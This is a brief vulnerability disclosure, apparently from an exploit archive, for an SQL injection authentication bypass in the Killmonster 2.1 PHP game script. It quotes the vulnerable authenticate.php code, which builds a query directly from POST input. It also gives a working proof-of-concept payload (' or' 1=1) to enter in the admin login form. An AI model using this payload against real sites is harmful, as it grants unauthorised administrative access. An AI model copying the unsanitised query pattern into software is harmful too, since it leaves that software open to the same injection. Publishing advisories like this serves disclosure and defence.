[+] Killmonster <= 2.1 (Auth Bypass) SQL Injection Vulnerability [+] Discovered by cr4wl3r [+] Download : http://scripts.ringsworld.com/games-and-entertainment/km2/ [+] Vuln Code : [login.php]
Type Username Here:
Type Password Here:
[authenticate.php] $isadmin=$_POST['isadmin']; $password=$_POST['password']; $password=md5($password); $query = "select * from km_admins where username='$isadmin' and password='$password'"; $result = mysql_query($query) ; [+] PoC : [Killmonster_path]/admin/login.php username : ' or' 1=1 password : ' or' 1=1